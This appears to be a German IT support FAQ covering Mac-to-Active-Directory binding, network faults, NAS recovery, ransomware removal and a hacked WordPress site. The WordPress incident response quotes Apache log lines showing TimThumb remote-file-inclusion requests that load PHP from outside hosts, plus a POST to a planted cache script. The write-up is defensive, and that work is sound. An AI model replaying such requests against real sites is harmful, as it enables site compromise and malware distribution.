Anfrage: Gibt es die Möglichkeit einen Mac an eine Windows Domain anzubinden? Wir haben ein Active Directory und würden unsere Mac Clients gerne über den Windows Server anbinden.

Lösung: Ja, das funktioniert sogar sehr gut. Über die Systemeinstellungen die Benutzerverwaltung aufrufen und das Schloss mit dem Administratorkennwort öffnen (Screenshots in Englisch).

Anschließend auf Login Options und in dem neuen Fenster auf Network Account Server und “Join” klicken:

In dem nächsten sich öffnenden Fenster “Open Directory Utiility”  anklicken:

Nun die Zeile “Active Directory” auswählen und auf den Bleistift klicken:

Nun kann mit den entsprechenden Angaben die Verbindung zum Active Directory konfiguriert werden. In einem Netzwerk mit Mac Clients unbedingt darauf achten, keine .local Domain zu verwenden, da es sonst Probleme mit Bonjour gibt.

Wir wählen immer noch den mobilen Account aus. Dann werden bei einer Serverunterbrechung die Daten bei der nächsten Verbindung übertragen:

Zu guter Letzt auf “Join” klicken und den Domain Beitritt mit den Zugangsdaten des Domain Admins bestätigen.

Anfrage: Der Zugriff auf unser Firmen-Server klappt nur sporadisch und auch nur mit stark schwankender Zugriffsgeschwindigkeit. Was ist da los?

Lösung: Bei einem ähnlich gelagerten Fall könnten wir in einer Netzwerkanalyse folgendes feststellen.

- Switchport springt zwischen 10, 100 und 1000 Mbit/s und zwischen half und full duplex.

- Ein pingen des Servers via IP-Adresse ist nur sporadisch möglich.

- Ein Verbindungsversuch auf der Server IP-Adresse konnektet uns auf ein anderes System

Die Fehlerursache konnte mit Hilfe der Switch Weboberfläche schnell eingegrenzt werden:

- Eine IP-Adresse wurde 2x vergeben. Dadurch ist der sporadische Zugriff auf den Server zu erklären. Nach Vergabe einer neuen eindeutigen IP-Adresse klappt der Zugriff auf den Server problemlos und unterbrechungsfrei.

- Das Patchkabel zwischen Switch und Server war defekt. Nach Austausch steht der Switch-Port fest auf 1 Gbit/s full duplex.

Tip: Hilfreich für die Fehlereingrenzung sind managed Switches, die eine Weboberfläche (oder Zugriff via SSH) mitbringen und dort ein Loggen von Fehlermeldungen ermöglicht. Alternativ empfiehlt sich ein Netzwerk Monitoringtool wie z.B. Wireshark.

Anfrage: Seit ein paar Tagen funktioniert die Mediathek App auf meinem Mac nicht mehr. Was soll ich machen?

Lösung: Laut der Webseite http://appdrive.net/mediathek/discontinued/ ist der Betrieb der Anwendung eingestellt worden. Gründe für das Abschalten liegen laut http://www.heise.de/mac-and-i/meldung/Mediathek-fuer-Mac-stellt-den-Dienst-ein-1776490.html nicht vor.

Nicht ganz so schön aufbereitet, aber dennoch eine gute Alternative ist das Programm MediathekView (http://zdfmediathk.sourceforge.net/index.html), das auf allen Plattform läuft, da in Java geschrieben.

Sollte ein Video nicht abspielbar sein, dann liegt es vermutlich daran, dass das Video im Flash-Format vorliegt. Bevor dieses abgespielt werden kann, muss es mit FLVstreamer aufgezeichnet und dann z.B. mit VLC geöffnet werden. Das Programm FLVstreamer ist im Download-File von MediathekView enthalten und befindet sich im Hauptverzeichnis. Das Speichern und Abspielen übernimmt das Programm automatisch, ggf. muss unter Datei… Einstellungen… Programm/Videoplayer/Programmsets… der Pfad zu FLVstreamer bzw. VLC angepasst werden.

Anfrage: Nach einem Stromausfall fährt die Buffalo Linkstation (NAS) nicht mehr hoch. Eine rote Leuchte signalisiert den Emergency Mode, den ich nicht mehr verlassen kann.

Lösung: Unsere Erfahrung mit NAS-Geräten von Buffalo ist, dass ein Firmware-Upgrade hilft, um den Emergency Mode (EM) wieder zu verlassen. Das lässt sich mit dem LSUpdater von der Buffalo Webseite bewerkstelligen.

Sollte bereits die neueste Firmware auf dem Gerät installiert sein, so wird das Programm ein Update verweigern, da ja schon die neueste Software installiert ist. Da hilft folgender Workaround. In der LSUpdater.ini müssen ein paar Flags geändert bzw. eingetragen werden.

[Flags]
VersionCheck = 0
NoFormatting = 1

[SpecialFlags]
Debug = 1

Sollte nach einem Neustart des Programms ein Update immer noch nicht möglich sein und eine Fehlermeldung erscheinen, dass kein Volume gefunden werden konnte, hat bei uns das Formatieren des Laufwerks geholfen. Achtung: Dabei gehen alle Daten verloren!

NoFormatting = 0

Anschließend bootet das Gerät neu, was bis zu 10 Minuten dauern kann. Danach war der Zugriff wie gewohnt möglich.

Anfrage: Die GPGTools vom GnuPG Project funktionieren nach dem Einspielen der Sicherheitsupdates unter 10.6.8 nicht mehr.

Lösung: Durch das Update wird das GPGTool Plugin von Apple Mail deaktiviert, kann aber mit dem folgenden Fix wieder aktiviert werden.

1.) Schließe Mail.app
2.) Download http://support.gpgtools.org/discussions/everything/1959/assets/dcab0c00ca29b88831bb6b2708db2d8106f27084/GPGMail.mailbundle-10.6.8.Security.Update.Fix.zip?anon_token=
3.) Entpacke das heruntergeladene Archiv
4.) Kopiere GPGMail.mailbundle nach /Library/Mail/Bundles
5.) Jetzt sollte das Plugin wieder funktionieren.

Für Mac OS 10.8 muss das Nightly Build installiert werden. https://nightly.gpgtools.org/

Anfrage: Mein Windows Rechner startet nicht mehr richtig. Nach dem Einloggen kommt ein Bild, das mich auffordert einen bestimmten Betrag zu zahlen, damit mein Rechner wieder freigeschaltet wird.

Lösung: Einer der bekanntesten Vertreter von Ransomware ist der BKA-Trojaner. Dieser Trojaner macht sich derart im System breit, dass der Rechner nicht mehr nutzbar ist.

Strategische Vorbereitung: keine

Operationale Vorbereitung:

• den Rechner im abgesicherten Modus starten
• TeamViewer QuickSupport ausführen
• Datenquellen: Windows Eventlogs
• Portable Apps auf USB-Stick geladen: Spybot, Clamwin, Malwarebytes, Security Task Manager

Datensammlung/Datenanalyse:

• Starten von Spybot Search & Destroy, Update, Immunisierung, Durchlauf: keine Funde
• Clamwin Update, Durchlauf: keine Funde
• Malware Bytes findet 5 Schädlinge und schiebt diese in die Quarantäne
• Security Task Manager zeigt keine verdächtigen Prozesse an.

Untersuchung:

• Trotz Verschieben der verdächtigen Dateien in Quarantäne bleibt Windows weiterhin nicht nutzbar. Der Trojaner muss sich noch tiefer in das System eingeklinkt haben.
• Programme im Autostart sehen nicht verdächtig aus. Auch wird kein rundll32 Aufruf beim Hochfahren angestoßen.
• Der Registry-Zweig HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon zeigt sowohl “Explorer.exe” als Shell und “C:\Windows\system32\userinit.exe,” bei Userinit an. Keine Auffälligkeiten an dieser Stelle.
• Die Event-Logs zeigen an, dass die explorer.exe kurz nach dem Hochfahren unerwartet beendet wird. Also muss hier doch das Problem liegen.
• Check Ordner C:\Windows und hier fällt auf, dass es die Dateien “explorer” und “explorer.exe” gibt. Bei genauerer Untersuchung stellen wir fest, dass “explorer” eigentlich “explorer.scf” heißt und eine Verknüpfung zur originalen “Explorer.exe” mit speziellen Parametern ist.

Vorbeugung:

• Viele Programme lassen sich im abgesicherten Modus nicht installieren oder updaten. Bei einigen funktioniert es jedoch auch hier: Firefox, Flash, Adobe Reader
• Installation PSI Secunia und Aktivieren von automatischen Updates
• Entfernen von “explorer.scf”
• Wiederherstellen der originalen Dateien “explorer.exe” und “userinit.exe” mit Hilfe des Windows Befehls “expand”.
• Löschen aller Java Verzeichnisse, so dass kein Aufruf der Java Runtime mehr möglich ist.
• Um auszuschließen, dass der Trojaner im Master Boot Record sitzt, einmal “fixmbr” ausgeführt, das den MBR neu schreibt.
• Löschen aller Temporären Dateien

Der Rechner startet nun normal hoch. Der installierte Virenscanner kann wieder Updates laden und das System überprüfen. Der Trojaner hat das Entdecken durch Virenscanner verhindert. Ein nochmaliger Durchlauf bringt ihn jetzt aber zur Strecke.

Anfrage: Besucher meiner Webseite beschweren sich, dass der Virenscanner beim Aufruf der Seite eine Trojanerwarnung meldet.

Lösung: Anbei unser Lösungsweg für diese Anfrage.

Symptom: Bei Aufruf der Webseite zeigt der Virenscanner eine Warnmeldung.

Strategische Vorbereitung:

• Timthumb Vulnerability Scanner ist als Wordpress Plugin installiert
• Wordpress ist auf dem aktuellsten  Stand

Operationale Vorbereitung:

• Datenquellen: Wordpress Verzeichnis
• Virenscan

Datensammlung:

• Online Virenscanner VirusTotal
• Wordpress Plugin Antivir
• Tools: ftp, clamscan

Untersuchung:

• Prüfen der Webseite bei VirusTotal: kein Fund
• Sicherung des Wordpress Root-Verzeichnisses auf lokale Festplatte via FTP. Clamscan Durchlauf schließt ohne Fund ab.
• Aufruf der Webseite mit Mac OS und Firefox: keine Auffälligkeiten
• Aufruf der Webseite mit Windows und Firefox: Avira zeigt Trojanermeldung. Ein Skript versucht ein PDF herunterzuladen und zu öffnen.
• Login WP-Admin
• Installation Wordpress Plugin Antivir und manueller Start: kein Fund
• Check Wordpress & Plugin Versionen und Recherche, ob bekannte Sicherheitslücken in den vorliegenden Versionen
• Durchlauf Timthumb Vulnerability Scanner zeigt eine veraltete, unsichere Timthumb Version an

Vorbeugung:

• Update Timthumb Skript
• Sicherheitskeys in wp-config.php eingetragen
• Update Wordpress Plugins
• Antivir mit täglichem Virenscan und Mailbenachrichtigung konfiguriert
• Aufruf der Webseite: keine Virenwarnung mehr

Damit dachten wir, dass alles erledigt wäre. Doch ein paar Tage später war die Säuberung wieder hinfällig. Ein weiterer Besucher beschwerte sich über eine Trojaner Meldung. Also mussten wir nochmal genauer suchen.

Operationale Vorbereitung:

• Datenquellen: Logfiles Apache2 Webserver, Wordpress Verzeichnis, MySQL Datenbank

Datensammlung:

• Tools: ftp, grep, clamscan, zcat
• Backup MySQL Datenbank
• Sicherung des Wordpress Root Verzeichnis inklusive Logfile Verzeichnis

Untersuchung:

• Virenscan mit Clamscan auf das Wordpress Verzeichnis: ohne Fund
• Aufruf der Webseite mit vorheriger Deaktivierung des Java Plugins für Firefox unter Windows => keine Trojaner Meldung
• Aufruf mit aktiviertem Java Plugin unter Windows => Avira schlägt an. Es handelt sich also um ein Java Exploit.
• Eingrenzung des Verursachers auf eine bestimmte Unterseite des Blogs mit dem Plugin “Slideshow Gallery”
• Auswertungen Apache2 Logfiles:

======================================================
1xx.53.32.10 - - [14/Dec/2011] “GET //wp-content/themes/irresistible/thumb.php?src=http://blogger.com.test.anime-tv.ro/pl.php HTTP/1.1”

1xx.96.25.14 - - [14/Dec/2011] “POST //wp-content/themes/irresistible/cache/f615d9006ef972e12076b63afbfbac19.php HTTP/1.1” 200 67021 “/wp-content/themes/irresistible/cache/f615d9006ef972e12076b63afbfbac19.php”

======================================================

Hier ist zu erkennen, dass die erste Infizierung über das Timthumb Skript innerhalb des Wordpress Themes erfolgte. Schadecode wurde aus dem Internet nachgeladen (GET) und Daten zu einer im Cache befindlichen PHP Seite übermittelt (POST).

Das Skript wurde jedoch vor ein paar Tagen upgedated. Wie kann es zu einer erneuten Virenverseuchung gekommen sein? Das Apache Logfile gibt Auskunft:

======================================================
2xx.168.198.201 - - [14/Jul/2012] “GET //wp-content/plugins/slideshow-gallery/vendors/timthumb.php?src=http://picasa.com.secretosdecuna.com/logs/timthumb.php HTTP/1.1”
======================================================

Es befindet sich ein weiteres Timthumb Skript in der Wordpress Installation im Ordner des vermuteten Plugins Slideshow Gallery. Warum wurde es vom Vulnerability Scanner nicht entdeckt und upgedated? Die Anzeige der Rechte von timthumb.php lässt erkennen, dass das Skript nur im Schreib- und nicht im Lesezugriff war.

• Installation des Plugins Theme-Check, welches beim Durchlauf weitere kritische Hinweise liefert, z.B. in der header.php Datei
• Logfiles mit grep nach weiteren Timthumb Skripten durchsucht. Keine weiteren Funde.

Vorbeugung:

• Löschen der Daten im Cache Ordner
• Leserechte für Timthumb Skript vergeben. Durchlauf Vulnerability Scanner und Update des Skriptes.
• Manuelles Entfernen von Schadcode aus der header.php Datei
• Kopieren des wp-admin Ordners aus einer frischen Installation
• Änderung der Passwörter

Ein erneuter Aufruf des Blogs mit einem Windows Rechner und aktiviertem Java Plugin führt zu keiner Warnmeldung seitens des Virenscanners. Sollte das auch nicht von Bestand sein, wäre das letzte Hilfsmittel eine komplette Neu-Installation des gesamtes Blogs.

Empfehlungen:

1. Wordpress aktuell halten. Updates zeitnah einspielen.
2. Nur notwendige Plugins installieren und aktivieren. Auch hier die Updates zeitnah einspielen.
3. Sicherheitskeys in wp-config.php eintragen (https://api.wordpress.org/secret-key/1.1/salt/)
4. Installation von Plugins zur Überprüfung der Sicherheit, z.B. Timthumb Vulnerability Scanner, Antivirus, Theme-Check
5. Logfiles gelegentlich auswerten
6. Einbinden von fremden Inhalten nur wenn unbedingt notwendig und Quelle als sicher empfunden

Anfrage: Ich möchte die Domain meines Blogs auf eine Unterdomain meiner Webseite (blog.domain.com) umleiten lassen.

Lösung: Bei Tumblr z.B. funktioniert das ganz einfach. Du gehst in die DNS-Einstellungen deines Webseitenbetreibers und fügst einen Eintrag in der Art hinzu:

Domain
blog.domain.com

Type
CNAME

Value
domains.tumblr.com

In Tumblr selbst gehst du in die Blogeinstellungen und sagst, dass du eine eigene Domain “blog.domain.com” verwenden möchtest. Bitte beachte, dass DNS-Änderungen bis zu 72 Stunden dauern können.

Bei anderen Blogseitenbetreibern sollten die Einstellungen ähnlich aussehen. Am besten mal in die FAQ’s schauen, wie die Weiterleitungsdomain oder IP-Adresse des Betreibers lauten.